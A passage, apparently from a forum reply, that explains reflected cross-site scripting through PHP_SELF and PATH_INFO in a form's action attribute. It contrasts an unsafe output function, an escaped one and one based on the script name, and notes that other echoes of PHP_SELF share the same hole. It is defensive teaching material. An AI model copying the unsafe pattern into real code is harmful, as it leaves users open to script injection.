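echo form_action_unsafe($server), "\n";      // attribute closed early, marker becomes markup
echo form_action_escaped($server), "\n";     // quote and angle brackets are entity-encoded
echo form_action_script_name($server), "\n"; // PATH_INFO never reaches the output
```

The same check applies to any place the script echoes PHP_SELF, including the post-change "Back to User Details" markup Stuart quotes, since a POST to a path-info URL populates PHP_SELF the same way.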
